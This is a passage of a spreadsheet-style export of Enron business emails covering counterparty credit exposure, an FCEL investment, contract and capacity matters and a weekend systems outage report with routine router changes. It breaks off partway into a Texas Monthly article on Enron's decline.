acquired Tarragon  Oil and Gas Ltd. in August 1998.  Marathon Canada Ltd. is _x000D_
a private company and requested a confidentiality agreement prior to its _x000D_
providing financial statements.  Enron delivered the CA in July 1999 and _x000D_
Marathon provided unaudited financials November 4.  Tarragon has a Master _x000D_
Physical in place and has MACd on its covenants as a result of not providing _x000D_
financial statements.  The financial statements provided need to be discussed _x000D_
in further detail with the counterparty.  A request for parent guaranty from _x000D_
Marathon Oil Company may be the final option prior to calling for _x000D_
collateral.  Total exposure to the combined entity is $13.5MM USD.  _x000D_
_x000D_
3) Talisman Energy Inc. acquired both Rigel Oil and Gas Ltd. and Highridge _x000D_
Exploration Ltd.  We have transactions confirmed under a Master Swap and a _x000D_
Master Physical with Highridge,  a Master Physical and a Master Swap with _x000D_
Talisman, and a Master Physical with Rigel.  Talisman has agreed to assign _x000D_
all outstanding deals to the existing master contracts we have in place with _x000D_
Talisman Energy Inc.  As soon as possible, we need legal to draft paper to _x000D_
Talisman moving the outstanding deals under the Rigel and Highridge contracts _x000D_
to the Talisman contracts.  In the same letter, Talisman has agreed to _x000D_
terminate the Rigel and Highridge contracts.  In return, credit has agreed to _x000D_
review the collateral thresholds and credit terms in the existing Talisman _x000D_
contracts.  Talisman has its third quarter financials available this Friday.  _x000D_
By the end of next week we should be able to send the letter to Talisman with _x000D_
amendments, transaction transfers, and Rigel/Highridge contract _x000D_
terminations.  Combined exposure for the entities is approximately $30MM USD._x000D_
_x000D_
4) Renaissance Energy Ltd. amalgamated Pinnacle Resources Ltd.  We have one _x000D_
deal on the books, but no contracts with Renaissance. We have a long term _x000D_
deal confirmed under a Master Swap and a long term deal confirmed under a _x000D_
Master Physical with Pinnacle.  Pinnacle does not want to move the existing _x000D_
Renaissance deal under the Pinnacle master agreement.  It appears as though _x000D_
Renaissance is finalizing a sale of assets that will include some Pinnacle _x000D_
properties.  If they sell the Pinnacle properties underlying our deals, they _x000D_
said they would probably assign the outstanding deals and contracts to the _x000D_
purchaser (presumably after obtaining Enron approval for such).  _x000D_
Renaissance's current corporate structure automatically obligates Renaissance _x000D_
to the obligations of Pinnacle and the resulting exposure under the two _x000D_
contracts.   Combined exposure for these entities is $13MM USD.  A credit _x000D_
review on Renaissance will be conducted within the next week._x000D_
_x000D_
5)  Devon Energy Corporation acquired Northstar Energy Corporation in _x000D_
December 1998.  Northstar continues to operate as a wholly owned subsidiary, _x000D_
has an executed Master Physical, and it has MACd on each of its covenants.  _x000D_
There is approximately $9.3MM USD mark to market exposure with Northstar.  _x000D_
Northstar has had several counterparties request a parent guaranty, but has _x000D_
not offered any to date.  Devon offers limited financial information on its _x000D_
Canadian operations in its 10-K, but exclusive Northstar data is not _x000D_
provided.  We have sent Northstar our preferred form of guaranty, and they _x000D_
have been unresponsive to subsequent phone calls.  _x000D_
</t>
  </si>
  <si>
    <t>Sun, 24 Sep 2000 09:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FCEL</t>
  </si>
  <si>
    <t>fyi  - there has been some concern that this deal was being put together _x000D_
without Connecticut authorities knowing the full extent of our interest in _x000D_
FCEL._x000D_
----- Forwarded by Steven J Kean/NA/Enron on 09/24/2000 04:51 PM -----_x000D_
_x000D_
	David W Delainey@ECT_x000D_
	09/22/2000 06:32 PM_x000D_
		 _x000D_
		 To: Janet R Dietrich/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, Heather _x000D_
Kroll/HOU/ECT@ECT, Charles Vetters/HOU/ECT@ECT, Jeffery Ader/HOU/ECT@ECT_x000D_
		 cc: Cliff Baxter/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, Jeff _x000D_
Donahue/HOU/ECT@ECT, Greg Whalley/HOU/ECT@ECT, Steven J Kean/NA/Enron@Enron_x000D_
		 Subject: FCEL_x000D_
_x000D_
Guys, I have spoken to Cliff and Mark and we are comfortable moving forward _x000D_
under the structure we have discussed._x000D_
_x000D_
 FCEL: - $5MM in equity and 1.3MM warrants from corporate treasury stock that _x000D_
vest based upon 60MW of orders;_x000D_
  - discussion with FCEL in which we disclose ALL infromation we have about _x000D_
the potential Conn. deal - I will require that myself and Mark be on   that _x000D_
call;_x000D_
  - the transaction is fully press released immediately._x000D_
_x000D_
 CRRA: - subject to final due diligence on the development risks, we provide _x000D_
the management and wrap for CRRA on the potential fuel cell development   _x000D_
opportunity that consists of between 25 and 50 MW;_x000D_
  - any appropriation of funds from the government will require DPUC hearing _x000D_
at which we will fully disclose in a factual manner our interest in    FCEL._x000D_
_x000D_
I will require that Mark Haedicke manage this process and sign off on all _x000D_
press releases, term sheets, disclosure discussions, contracts and regulatory _x000D_
filings.  I believe that we have this managed appropriately as long as we _x000D_
manage the process as per the script and in a factual manner._x000D_
_x000D_
Thanks_x000D_
Delainey</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.miller@enron.com', 'lorraine.lindberg@enron.com', 'glen.hass@enron.com'})</t>
  </si>
  <si>
    <t>RP00-249 Rehearing Request</t>
  </si>
  <si>
    <t xml:space="preserve">Take a look at this and let me know if you have further comments._x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 10/13/2000 _x000D_
09:45 AM ---------------------------_x000D_
_x000D_
_x000D_
"Gallagher, Boland and Meiburger" &lt;dhess@gbmdc.com&gt; on 10/13/2000 08:25:11 AM_x000D_
To: "Susan Scott" &lt;Susan.Scott@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RP00-249 Rehearing Request_x000D_
_x000D_
_x000D_
    Please see attached from Steve Stojic._x000D_
_x000D_
 - rehearing req.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Dec 1999 08:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Evergreen deals</t>
  </si>
  <si>
    <t xml:space="preserve">No that is a GTC firm that will expire when the contract does._x000D_
_x000D_
Julie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
12/20/99 04:05 PM_x000D_
To: Julie Meyers/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Evergreen deals  _x000D_
_x000D_
Vintage should be 93730._x000D_
_x000D_
_x000D_
_x000D_
Julie Meyers_x000D_
12/20/99 02:27 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Evergreen deals  _x000D_
_x000D_
_x000D_
Look at comments below._x000D_
_x000D_
Julie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
12/20/99 01:43 PM_x000D_
To: Julie Meyers/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Evergreen deals_x000D_
_x000D_
Julie, _x000D_
_x000D_
I need to know if the following deals have evergreen provisions to roll into _x000D_
Jan 2000._x000D_
_x000D_
Cokinos / 9676  95912 - No this is a GTC Firm contract, deal expires with _x000D_
contract_x000D_
Cokinos / 6373  128952 - This is a GTC Spot_x000D_
Coral / 4120  93883 - This is on a Single Transaction contract, we would need _x000D_
to check with the trader_x000D_
Encina / 6392  93487 - Yes, this is a committed reserve.  I marked the _x000D_
evergreen flag._x000D_
Midcoast / 5097  92956 - No, GTC 1st Purchaser, deal expires with contract._x000D_
United O&amp;M / 5053 93728 - No, this deal was moved to the Wellhead portfolio _x000D_
for January, but the deal was terminated per legal._x000D_
Vintage / 2540  93750 - Not the right deal number._x000D_
_x000D_
Thanks._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 05:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the master list of contracts.  I save this file as _x000D_
o:/common/logistics/capacity/east/ne/ces/hodge 12 23 1999.xls.  I know you _x000D_
have an abundance of time on your hands so feel free to browse this tiny _x000D_
little worksheet.  Call me if you have questions._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 12/27/99 12:33 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
jwhodge@columbiaenergygroup.com on 12/23/99 02:31:55 PM_x000D_
To: Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, "        -         _x000D_
*Goodell, Scott" &lt;sgoodel@columbiaenergygroup.com&gt;_x000D_
cc:  _x000D_
Subject: Transportation &amp; Storage Contracts_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest file on capacity.  I have updated the C&amp;I list for_x000D_
releases from O&amp;R on Columbia Gulf and TCO, from BUG on TETCO and from LILCO _x000D_
on_x000D_
Transco.  I have updated the Choice list for releases from Atlanta on CNG,_x000D_
Sonat, South Georgia and Transco.   On the Wholesale list, I have reflected _x000D_
the_x000D_
releases that we have made on Columbia Gulf, TCO and TETCO from capacity_x000D_
associated with the Penn Fuel asset management deal and for the release from_x000D_
South Jersey on Transco.  All of these changes are highlighted in blue.  The_x000D_
following releases have not yet taken place for 1/2000, but should happen on_x000D_
Monday or Tuesday:_x000D_
_x000D_
C&amp;I_x000D_
_x000D_
CNG - Release from Hope for sale to Bayer_x000D_
CNG - NiMo customers_x000D_
TCO - Release from Eagle Point for sale to COH customers_x000D_
TETCO - Dayton Power &amp; Light customers_x000D_
Texas Gas - Dayton Power &amp; Light customers_x000D_
Transco - PSNC customers_x000D_
Trunkline - Dayton Power &amp; Light customers_x000D_
_x000D_
_x000D_
Choice_x000D_
_x000D_
East Tennessee - Atlanta customers_x000D_
Midwestern - NIPSCO customers_x000D_
NGPL - NIPSCO customers_x000D_
Tennessee - Atlanta customers_x000D_
_x000D_
If you have any questions, please call Scott Goodell or myself._x000D_
_x000D_
_x000D_
 - Transport Master List for                     Enron.xls_x000D_
</t>
  </si>
  <si>
    <t>Sat, 29 Jan 2000 05:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'terence.thorn@enron.com'})</t>
  </si>
  <si>
    <t>MAJOR ACTIVITIES AS OF 1/14/00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Terence H Thorn/ENRON_DEVELOPMENT on _x000D_
01/29/2000 01:08 PM ---------------------------_x000D_
   _x000D_
	Enron International_x000D_
	_x000D_
	From:  John Hardy                           01/19/2000 01:00 PM_x000D_
	_x000D_
_x000D_
Sent by: Helen Rizzo_x000D_
To: Terence H Thorn/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Steven J Kean@EES _x000D_
_x000D_
Subject: MAJOR ACTIVITIES AS OF 1/14/00_x000D_
_x000D_
Attached are major activities for the Washington Finance/Project Support _x000D_
Office as of January 14, 2000._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 16:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: FW: EEI Collateral Documentation</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
----- Forwarded by Elizabeth Sager/HOU/ECT on 06/06/2001 01:45 PM -----_x000D_
_x000D_
_x000D_
	"Andy Katz" &lt;AKatz@eei.org&gt; 06/06/2001 01:35 PM 	   To: &lt;elizabeth.sager@enron.com&gt;  cc:   Subject: Fwd: FW: EEI Collateral Documentation	_x000D_
_x000D_
_x000D_
_x000D_
One of two comments received on Collateral Annex documents_x000D_
_x000D_
Andrew S. Katz, Director Industry Legal Affairs_x000D_
Edison Electric Institute_x000D_
701 Pennsylvania Avenue, N.W._x000D_
Washington, D.C.  20004_x000D_
Voice:  202-508-5616_x000D_
Fax:     202-508-5673_x000D_
e-mail:  akatz@eei.org_x000D_
 - TEXT.htm _x000D_
Received: from pitbull.ep.hess.com	(ns.ameradahess.com [207.51.255.129])	by mail.eei.org; Tue, 05 Jun 2001 17:12:38 -0400_x000D_
Received: from hacnte03.ep.hess.com by pitbull.ep.hess.com          via smtpd (for mail.eei.org [204.254.108.2]) with SMTP; 5 Jun 2001 21:19:50 UT_x000D_
Received: from wdb-ex-001.rm.hess.com (wdbex001.rm.hess.com [10.103.10.17]) by hacnte03.ep.hess.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)	id LQBNCY6M; Tue, 5 Jun 2001 16:19:49 -0500_x000D_
Received: by wdbex001.rm.hess.com with Internet Mail Service (5.5.2448.0)	id &lt;MJ9CSD7J&gt;; Tue, 5 Jun 2001 17:19:41 -0400_x000D_
Message-ID: &lt;7911DD490C96D311B6AA00508B63B97A03A4326A@wdbex003.rm.hess.com&gt;_x000D_
From: "Crespo, John" &lt;jcrespo@hess.com&gt;_x000D_
To: "'akatz@eei.org'" &lt;akatz@eei.org&gt;_x000D_
Subject: FW: EEI Collateral Documentation_x000D_
Date: Tue, 5 Jun 2001 17:19:29 -0400_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2448.0)_x000D_
Content-Type: text/plain;	charset="iso-8859-1"_x000D_
_x000D_
Andy, we didn't have too many comments, but here they are:_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Cerria, Chuck (Commodities - NY)_x000D_
&gt; Sent:	Tuesday, June 05, 2001 4:16 PM_x000D_
&gt; To:	Crespo, John_x000D_
&gt; Cc:	Butala, John (Commodities - NY); Trivino, Grimuald (Commodities -_x000D_
&gt; NY)_x000D_
&gt; Subject:	EEI Collateral Documentation_x000D_
&gt;_x000D_
&gt; We concur with Enron's and AEP's comments, except as follows:_x000D_
&gt;_x000D_
&gt; 1.Interest should be payable on cash collateral held each month and upon_x000D_
&gt; return of the collateral._x000D_
&gt; 2. 15 days to expiry should be the trigger on LC's so that if the LC does_x000D_
&gt; not auto renew, the pledgee can draw down on the LC when the expiry is_x000D_
&gt; within 15 days._x000D_
&gt;_x000D_
_x000D_
 - Andy Katz.vcf </t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 09:17:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'howard.marshall@enron.com', 'tammie.schoppe@enron.com', 'paula.harris@enron.com', 'rogers.herndon@enron.com', 'george.wood@enron.com', 'iris.mack@enron.com', 'dana.davis@enron.com', 'susan.rance@enron.com', 'wendy.conwell@enron.com', 'carl.tricoli@enron.com', 'lex.carroll@enron.com', 'doug.gilbert-smith@enron.com', 'terri.clynes@enron.com', 'oscar.dalton@enron.com', 'lloyd.will@enron.com', 'matthew.duffy@enron.com', 'tara.piazze@enron.com', 'larry.valderrama@enron.com', 'susan.helton@enron.com', 'rob.wheeler@enron.com', 'edward.sacks@enron.com', 'william.fleenor@enron.com', 'kenneth.thibodeaux@enron.com', 'louise.kitchen@enron.com', 'tina.rode@enron.com', 'tom.may@enron.com', 'd..baughman@enron.com', 'm..presto@enron.com', 'greg.trefz@enron.com', 'wayne.vinson@enron.com', 'david.forster@enron.com', 'mike.curry@enron.com', 'fernando.herrera@enron.com', 'william.abler@enron.com', 'j..sturm@enron.com', 'terrell.benke@enron.com', 'david.duran@enron.com', 'eric.irani@enron.com', 'larry.jester@enron.com', 'jim.meyn@enron.com', 'zachary.inman@enron.com', 'john.kinser@enron.com', 'maria.valdes@enron.com', 'tracy.ngo@enron.com', 'nick.politis@enron.com', 'laurel.bolt@enron.com', 'paul.radous@enron.com', 'trey.hardy@enron.com', 'e..kelly@enron.com', 'nick.hiemstra@enron.com', 'doug.sewell@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Deal Report</t>
  </si>
  <si>
    <t>Attached is the Weekly Deal Report from 10/25/01-10/31/01_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
Lex Carroll_x000D_
Enron East Power Marketing, Inc._x000D_
Midwest Origination_x000D_
713-853-5426</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 07:23:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ed.hlopak@enron.com'})</t>
  </si>
  <si>
    <t>RE: Master Netting Agreements</t>
  </si>
  <si>
    <t>Susan,_x000D_
_x000D_
Did you intend to attach something to this email?_x000D_
_x000D_
Ed Hlopak_x000D_
Sr. Project Manager_x000D_
Enron Wholesale Services Estate Management_x000D_
713-345-9363 (office)_x000D_
713-417-4412 (cell)_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bailey, Susan  _x000D_
Sent:	Tuesday, January 22, 2002 4:10 PM_x000D_
To:	EWS-CCT_x000D_
Cc:	Aronowitz, Alan_x000D_
Subject:	Master Netting Agreements_x000D_
_x000D_
_x000D_
Edward, _x000D_
_x000D_
Attached is 4th part.  This is the final part._x000D_
_x000D_
By receipt of this transmission, you are now in possession of all the electonic/pdf formatted Master Netting Agreements, which were included in the binder delivered to Raj last week.  _x000D_
_x000D_
One note of clarification -- I have provided the electronic/pdf version of the Florida Power &amp; Light Company agreement.  However, at the time the binder was delivered this agreement had not come my way; therefore, it is not included in the current binder is scheduled to be included a supplemental binder._x000D_
_x000D_
Please advise if I may be of further assistance._x000D_
_x000D_
_x000D_
_x000D_
Cordially, _x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3803A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
Email: Susan.Bailey@enron.com</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 19:47:16 -0800 (PST)</t>
  </si>
  <si>
    <t>TW Capacity Available for Sale</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Steve,_x000D_
_x000D_
Per my note, the attached is electronic form of data requested._x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 09:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 11-10-00</t>
  </si>
  <si>
    <t xml:space="preserve">------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
November 10, 2000 5:00pm through November 13, 2000 12:00am_x000D_
------------------------------------------------------------------------------_x000D_
------------------------_x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: POSTPONED_x000D_
Impact:  EDI_x000D_
Time:  Sat 11/11/2000 at  11:00:00 PM CT thru Sun 11/12/2000 at  1:00:00 AM CT_x000D_
 Sat 11/11/2000 at    9:00:00 PM PT thru Sat 11/11/2000 at 11:00:00 PM PT_x000D_
 Sun 11/12/2000 at   5:00:00AM London thru Sun 11/12/2000 at 7:00:00 AM London_x000D_
Outage:  EDI HUB DISK VOLUME INCREASE_x000D_
Environments Impacted:  Corporate_x000D_
Purpose: Continued EDI volume increases require the addition of more disk _x000D_
space for EDI operations.  _x000D_
Backout: Utilize current configuration w/o new HACMP configuration_x000D_
Contact(s):  Jack Metkus    _x000D_
  Jim Nelson  3-7799  713-327-2007_x000D_
  Karen O'Grady  5-7149  713-327-4805_x000D_
  Jack Metkus  3-0362  713-288-0743_x000D_
_x000D_
EI: SEE ORIGINAL REPORT_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:  No Scheduled Outages._x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: ALSO SEE ORIGINAL REPORT_x000D_
Impact:  eol_x000D_
Time:  Fri 11/10/2000 at  6:00:00 PM CT  thru Fri 11/10/2000 at  7:00:00 PM _x000D_
CT _x000D_
 Fri 11/10/2000 at  4:00:00 PM PT thru Fri 11/10/2000 at   5:00:00 PM PT_x000D_
 Sat 11/11/2000 at 12:00:00 AM London thru Sat 11/11/2000 at  1:00:00 AM _x000D_
London_x000D_
Outage:  eol net change_x000D_
Environments Impacted:  EOl_x000D_
Purpose: _x000D_
We have found that IP multicast storms on the EOL internal subnet 172.16.21.0 _x000D_
briefly incapacitate the EOL firewall eolfw1.  To solve the problem, we will _x000D_
insert a new VLAN/subnet 172.16.23.0 between 172.16.21.0 and the firewall so _x000D_
that no IP multicast traffic will reach the firewall interface.  Physical _x000D_
work includes running two copper cables from trd-cx[12]-3405 port 6/7 to _x000D_
eolfw1 and logical work entails defining the new VLAN on the _x000D_
switches/routers, enabling interface vlan23 and changing_x000D_
_x000D_
ip route 192.216.56.0 255.255.255.0 172.16.21.4_x000D_
ip route 192.216.57.0 255.255.255.0 172.16.21.4_x000D_
to_x000D_
ip route 192.216.56.0 255.255.255.0 172.16.23.4_x000D_
ip route 192.216.57.0 255.255.255.0 172.16.23.4_x000D_
on the routers, and replacing_x000D_
route inside 10.0.0.0 255.0.0.0 172.16.21.1 1_x000D_
route inside 172.16.0.0 255.242.0.0 172.16.21.1 1_x000D_
route inside 192.168.0.0 255.255.0.0 172.16.21.1 1_x000D_
with_x000D_
route inside 10.0.0.0 255.0.0.0 172.16.23.1 1_x000D_
route inside 172.16.0.0 255.242.0.0 172.16.23.1 1_x000D_
route inside 192.168.0.0 255.255.0.0 172.16.23.1 1_x000D_
on eolfw1._x000D_
Backout: _x000D_
Contact(s):  Anchi Zhang  713-853-5464 _x000D_
     _x000D_
LOTUS NOTES: No Scheduled Outages._x000D_
_x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS: ALSO SEE ORIGINAL REPORT     _x000D_
Impact:  CORP_x000D_
Time:  Sat 11/11/2000 at  8:30:00 AM Buenos Aires thru Sat 11/11/2000 at  _x000D_
5:00:00 PM Buenos Aires_x000D_
 Sat 11/11/2000 at  5:30:00 AM CT thru Sat 11/11/2000 at  2:00:00 PM CT_x000D_
 Sat 11/11/2000 at  3:30:00 AM PT thru Sat 11/11/2000 at  12:00:00 PM PT_x000D_
 Sat 11/11/2000 at  11:30:00 AM London thru Sat 11/11/2000 at  8:00:00 PM _x000D_
London_x000D_
Outage:  Maintenance electricity_x000D_
Environments Impacted:  ESA - Buenos Aires_x000D_
Purpose: Electrical security_x000D_
Backout: Back to the original project._x000D_
Contact(s):  Ariel Bruch    _x000D_
  Nilson Busto  55-11-5503-1347 office_x000D_
55-11-9233-7481 cel  _x000D_
           _x000D_
Impact:  ESA_x000D_
Time:  Sun 11/12/2000 at  2:30:00 PM Brazil thru Sun 11/12/2000 at  6:00:00 _x000D_
PM Brazil_x000D_
 Sun 11/12/2000 at  10:30:00 AM CT thru Sun 11/12/2000 at  2:00:00 PM CT_x000D_
 Sun 11/12/2000 at   8:30:00 AM PT thru Sun 11/12/2000 at  12:00:00 PM PT_x000D_
 Sun 11/12/2000 at  4:30:00 PM London thru Sun 11/12/2000 at  8:00:00 PM _x000D_
London_x000D_
Outage:  Maintenance to the electrical systems_x000D_
Environments Impacted:  Sao Paulo Office_x000D_
Purpose: Security maintenance_x000D_
Backout: Back to the original project._x000D_
Contact(s):  Nilson Busto  55-11-5503-1347 office_x000D_
55-11-9233-7481 cel  _x000D_
  _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: SEE ORIGINAL REPORT_x000D_
    _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  _x000D_
Impact:  CORP_x000D_
Time:  Fri 11/10/2000 at  6:00:00 PM CT thru Sat 11/11/2000 at  8:15:00 AM CT_x000D_
 Fri 11/10/2000 at  4:00:00 PM PT thru Sat 11/11/2000 at  6:15:00 AM PT _x000D_
 Sat 11/11/2000 at  12:00:00 AM London thru Sat 11/11/2000 at  2:15:00 PM _x000D_
London_x000D_
Outage:  Unify_x000D_
Environments Impacted:  Unify Users_x000D_
Purpose: For better I/O performance_x000D_
Backout: Restore the database with the backup_x000D_
Contact(s):  Jaikishore Bharathi   713-853-0347 _x000D_
------------------------------------------------------------------------------_x000D_
-------------------------------------------------------_x000D_
FOR ASSISTANCE_x000D_
_x000D_
(713) 853-1411   Enron Resolution Center_x000D_
(713) 853-5536   Information Risk Management_x000D_
_x000D_
Specific Applications Help:_x000D_
Unify On-Call      (713) 284-3757  [Pager]_x000D_
Sitara On-Call     (713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS   (713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP    (713) 285-3165  [Pager]_x000D_
CPR      (713) 284-4175  [Pager]_x000D_
EDI Support      (713) 327-3893  [Pager]_x000D_
All Other Systems    (713) 563-5797  [Pager]_x000D_
      or (713) 563-5987  [Pager]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 05:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Redline of revised assignment and assumption agreement._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 12:10:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: interesting article on Enron</t>
  </si>
  <si>
    <t>=20_x000D_
How Enron Blew It_x000D_
_x000D_
Texas Monthly_x000D_
_x000D_
November 2001_x000D_
_x000D_
Less than a year ago, the Houston-based energy behemoth had everything: mon=_x000D_
ey, power, glitz, smarts, new ideas, and a CEO who wanted to make it the mo=_x000D_
st important company in the world. Now its stock is down, wall street is be=_x000D_
arish, and the CEO is gone. What went wrong?_x000D_
_x000D_
by Mimi Swartz &lt;http://www.texasmonthly.com/mag/issues/authors/mimiswartz.p=_x000D_
hp&gt;_x000D_
_x000D_
THE ENRON SKYSCRAPER NEAR THE SOUTH END OF HOUSTON'S DOWNTOWN feels like th=_x000D_
e international headquarters of the best and the brightest. The lobby in no=_x000D_
 way resembles the hushed, understated entryways of the old-fashioned oil c=_x000D_
ompanies, like Shell and Texaco nearby. Enron, in contrast, throbs with mod=_x000D_
ernity. The people hustling in and out of the elevators are black, white, b=_x000D_
rown; Asian, Middle Eastern, European, African, as well as American-born. T=_x000D_
hey are young, mostly under 35, and dressed in the aggressively casual unif=_x000D_
orm of the tech industry-the guys wear khakis, polo shirts, and Banana Repu=_x000D_
blic button-downs. Almost preposterously fit, they move through the buildin=_x000D_
g intently, like winners. Enron is nothing if not energetic: A Big Brother-=_x000D_
size TV screen frantically reports on the stock market near a bank of eleva=_x000D_
tors, while another hefty black television relaying the same news greets pe=_x000D_
ople entering from the garage. A sculpture of the corporate symbol, an E ti=_x000D_
pped at a jaunty angle, radiates colors as it spins frenetically on its axi=_x000D_
s; a Starbucks concession on the ground floor keeps everyone properly caffe=_x000D_
inated. Multicolored, inspirational flags hang from the ceiling, congratula=_x000D_
ting Enron on its diversity and its values; one more giant banner between e=_x000D_
levator banks declares Enron's simple if grandiose goal: "From the World's =_x000D_
Leading Energy Company to . . . The World's Leading Company!"_x000D_
_x000D_
For a while, that future seemed guaranteed, as Enron transformed itself fro=_x000D_
m a stodgy, troubled pipeline company in 1985 to a trading colossus in 2000=_x000D_
. It was a Wall Street darling, with a stock price that increased 1,700 per=_x000D_
cent in that sixteen-year period, with revenues that increased from $40 bil=_x000D_
lion to $100 billion. "The very mention of the company in energy circles th=_x000D_
roughout the world creates reactions ranging from paralyzing fear to envy,"=_x000D_
 notes a 2001 report from Global Change Associates, a firm that provides ma=_x000D_
rket intelligence to the energy business._x000D_
_x000D_
This Enron was largely the creation of Jeff Skilling, a visionary determine=_x000D_
d to transform American business. Hired sixteen years ago as a consultant b=_x000D_
y then-CEO Ken Lay, Skilling helped build a company that disdained the old =_x000D_
formula of finding energy in the ground, hauling it in pipelines, and then =_x000D_
selling it to refineries and other customers. Instead, it evolved into a co=_x000D_
mpany that could trade and market energy in all its forms, from natural gas=_x000D_
 to electricity, from wind to water. If you had a risky drilling venture, E=_x000D_
nron would fund it for a piece of the action. If you wanted your megacorpor=_x000D_
ation's energy needs analyzed and streamlined, Enron could do the job. If y=_x000D_
ou were a Third World country with a pitiful infrastructure and burgeoning =_x000D_
power needs, Enron was there to build and build. Basically, if an idea was =_x000D_
new and potentially-and fantastically-lucrative, Enron wanted the first cra=_x000D_
ck. And with each success, Enron became ever more certain of its destiny. T=_x000D_
he company would be the bridge between the old economy and the high-tech wo=_x000D_
rld, and in February of this year, Skilling reaped his reward when he succe=_x000D_
eded Lay as chief executive officer. Enron, says Skilling, "was a great mar=_x000D_
riage of the risk-taking mentality of the oil patch with the risk-taking me=_x000D_
ntality of the financial markets."_x000D_
_x000D_
The Enron story reflects the culture that drove American business at the en=_x000D_
d of the twentieth century. Like the high-tech companies it emulated, Enron=_x000D_
 was going to reinvent the American business model and, in turn, the Americ=_x000D_
an economy. Maybe it was natural that this Brave New World also produced a =_x000D_
culture that was based on absolutes: not just the old versus the new, but t=_x000D_
he best versus the mediocre, the risk takers versus the complacent-those wh=_x000D_
o could see the future versus those who could not. The key was investing in=_x000D_
 the right kind of intellectual capital. With the best and the brightest, a=_x000D_
 company couldn't possibly go wrong._x000D_
_x000D_
Or could it? Today Enron's stock trades at around $35, down from a high of =_x000D_
$80 in January. The press cast Enron as the archvillain of California's ene=_x000D_
rgy crisis last spring, and Skilling caught a blueberry pie in the face for=_x000D_
 his relentless defense of the free market. A long-troubled power plant pro=_x000D_
ject in India threatened the company's global ambitions. Telecommunications=_x000D_
, in which Enron was heavily invested, imploded. Wall Street analysts who o=_x000D_
nce touted the company questioned its accounting practices. Some of the cha=_x000D_
nge in Enron's fortunes can be attributed to the economic downturn in uncer=_x000D_
tain times that has afflicted all of American business. But the culture tha=_x000D_
t the company created and lived by cannot escape blame._x000D_
_x000D_
